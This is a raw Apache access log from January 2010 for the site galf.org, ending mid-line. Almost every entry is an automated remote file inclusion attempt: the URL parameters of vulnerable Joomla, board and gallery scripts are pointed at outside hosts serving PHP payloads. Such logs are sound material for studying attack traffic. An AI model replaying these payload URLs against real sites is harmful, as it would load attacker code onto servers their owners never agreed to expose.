66.135.42.60 - - [18/Jan/2010:04:20:53 -0800] "GET /logs/access_091012.log///index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [18/Jan/2010:04:22:33 -0800] "GET /skin/zero_vote/error.php?dir=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [18/Jan/2010:04:22:33 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [18/Jan/2010:04:22:33 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.128.28.202 - - [18/Jan/2010:04:24:11 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:26:19 -0800] "GET /logs/access_091019.log///index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:28:27 -0800] "GET /logs/access_091019.log///index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.128.28.202 - - [18/Jan/2010:04:28:58 -0800] "GET /logs/access_090824.log%20%20//skin/zero_vote/error.php?dir=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:04:31:59 -0800] "GET /?board_skin_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:04:32:02 -0800] "GET /logs/access.log%20%20/?board_skin_path=http://www.aimadis.org/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:04:32:02 -0800] "GET /logs/?board_skin_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [18/Jan/2010:04:32:22 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.191.144.32 - - [18/Jan/2010:04:34:11 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.191.144.32 - - [18/Jan/2010:04:34:11 -0800] "GET /logs/access_091207.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.191.144.32 - - [18/Jan/2010:04:34:11 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [18/Jan/2010:04:37:03 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:04:37:53 -0800] "GET /logs/access.log/?board_skin_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:04:37:53 -0800] "GET /?board_skin_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:04:37:53 -0800] "GET /logs/?board_skin_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
211.95.78.56 - - [18/Jan/2010:04:38:53 -0800] "GET /logs/access_090824.log%20%20//skin/zero_vote/error.php?dir=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:04:39:53 -0800] "GET /logs///ImageManager.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:04:39:53 -0800] "GET /logs/access_091109.log%20%20///ImageManager.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:04:39:53 -0800] "GET //ImageManager.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:40:18 -0800] "GET /logs///skin/inrize_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:40:19 -0800] "GET //skin/inrize_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:40:21 -0800] "GET /logs/access.log///skin/inrize_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:40:36 -0800] "GET //skin/inrize_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:40:36 -0800] "GET /logs///skin/inrize_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:40:37 -0800] "GET //administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:40:38 -0800] "GET /logs/access_091214.log///skin/inrize_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:40:40 -0800] "GET /logs///administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:40:40 -0800] "GET /logs/access_091116.log%20%20///administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:41:10 -0800] "GET //administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:41:11 -0800] "GET /logs///administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:41:13 -0800] "GET /logs/access_091116.log///administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:41:19 -0800] "GET //skin/inrize_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:41:20 -0800] "GET /logs///skin/inrize_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:41:20 -0800] "GET /logs/access_091214.log///skin/inrize_blue/setup.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:41:47 -0800] "GET //administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [18/Jan/2010:04:41:47 -0800] "GET /logs/access.log///administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [18/Jan/2010:04:41:48 -0800] "GET /logs///administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [18/Jan/2010:04:42:33 -0800] "GET /logs///ImageManager.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:04:42:33 -0800] "GET //ImageManager.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:04:42:33 -0800] "GET /logs/access_091109.log///ImageManager.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:44:00 -0800] "GET /logs/access_090720.log//mes-stats/index.cgi%253Flang%253Den//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:44:00 -0800] "GET /mes-stats/index.cgi%253Flang%253Den//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:44:00 -0800] "GET /mes-stats/index.cgi%253Flang%253Den//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:44:00 -0800] "GET /logs/access_090720.log//mes-stats/index.cgi%253Flang%253Den//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:44:00 -0800] "GET /logs//mes-stats/index.cgi%253Flang%253Den//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:44:03 -0800] "GET /logs//mes-stats/index.cgi%253Flang%253Den//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.121.74.226 - - [18/Jan/2010:04:44:20 -0800] "GET /bbs//delete_all.php?board_skin_path=http://213.251.185.84/~janol/id11.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.121.74.226 - - [18/Jan/2010:04:44:20 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://213.251.185.84/~janol/id11.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.121.74.226 - - [18/Jan/2010:04:44:20 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://213.251.185.84/~janol/id11.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:04:44:40 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:04:44:41 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:04:44:45 -0800] "GET /logs/access_091228.log%20%20//modules/My_eGallery/index.php?basepath=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:04:44:49 -0800] "GET /logs/access_090831.log%20%20//modules/My_eGallery/index.php?basepath=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:04:44:49 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:04:44:49 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:04:44:52 -0800] "GET /logs/access_091228.log%20%20//modules/My_eGallery/index.php?basepath=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:04:44:54 -0800] "GET /logs/access_090831.log%20%20//modules/My_eGallery/index.php?basepath=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:44:59 -0800] "GET /logs///kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:44:59 -0800] "GET /logs/access_090928.log///kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:44:59 -0800] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:04:45:08 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:04:45:08 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:04:45:12 -0800] "GET /logs/access_091228.log%20%20//modules/My_eGallery/index.php?basepath=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:04:45:15 -0800] "GET /logs/access_090831.log%20%20//modules/My_eGallery/index.php?basepath=http://www.johngarzon.com.co//list/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:45:19 -0800] "GET /mes-stats/index.cgi%253Flang%253Den//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:45:19 -0800] "GET /logs/access_090720.log//mes-stats/index.cgi%253Flang%253Den//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:45:19 -0800] "GET /logs//mes-stats/index.cgi%253Flang%253Den//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:45:28 -0800] "GET /logs/access_091012.log//mes-stats/index.cgi%253Flang%253Den//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:46:00 -0800] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.135.42.60 - - [18/Jan/2010:04:46:00 -0800] "GET /logs///kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.135.42.60 - - [18/Jan/2010:04:46:00 -0800] "GET /logs/access.log///kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.135.42.60 - - [18/Jan/2010:04:46:07 -0800] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:46:07 -0800] "GET /logs/access_100111.log///kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:46:07 -0800] "GET /logs///kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.115.6.14 - - [18/Jan/2010:04:46:58 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:47:01 -0800] "GET /logs/access_090720.log///kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.248.104.130 - - [18/Jan/2010:04:48:28 -0800] "GET /logs/access_090928.log//include/print_category.php?setup[use_category]=1&dir=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
125.248.104.130 - - [18/Jan/2010:04:48:29 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
125.248.104.130 - - [18/Jan/2010:04:48:30 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
125.248.104.130 - - [18/Jan/2010:04:49:20 -0800] "GET /logs/access_091019.log//include/print_category.php?setup[use_category]=1&dir=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
80.191.144.32 - - [18/Jan/2010:04:52:30 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
80.191.144.32 - - [18/Jan/2010:04:52:30 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
80.191.144.32 - - [18/Jan/2010:04:52:30 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [18/Jan/2010:04:55:33 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:55:33 -0800] "GET /logs/access_090615.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:55:33 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:55:34 -0800] "GET /logs/access_090928.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:55:44 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:55:44 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:55:44 -0800] "GET /logs/access_090615.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:56:55 -0800] "GET /logs/access_090928.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [18/Jan/2010:04:57:21 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.113.224 - - [18/Jan/2010:04:57:22 -0800] "GET /tmp/?M=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:57:45 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:57:45 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:57:45 -0800] "GET /logs/access_090928.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:58:16 -0800] "GET /logs/access_091207.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.121.74.226 - - [18/Jan/2010:04:58:17 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://213.251.185.84/~janol/id11.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:58:48 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:58:48 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:58:48 -0800] "GET /logs/access_090928.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:59:18 -0800] "GET /logs/access_091207.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:59:58 -0800] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [18/Jan/2010:04:59:59 -0800] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [18/Jan/2010:05:00:00 -0800] "GET /logs//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [18/Jan/2010:05:00:00 -0800] "GET /logs/access.log%20%20//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [18/Jan/2010:05:00:06 -0800] "GET /logs/access.log//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.16.230.82 - - [18/Jan/2010:05:00:06 -0800] "GET /logs//cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.135.42.60 - - [18/Jan/2010:05:00:11 -0800] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:05:00:11 -0800] "GET /logs///index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:05:00:11 -0800] "GET /logs/access_091012.log///index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.191.144.32 - - [18/Jan/2010:05:00:13 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://azovcable.ru/images/smilies/copyright.txt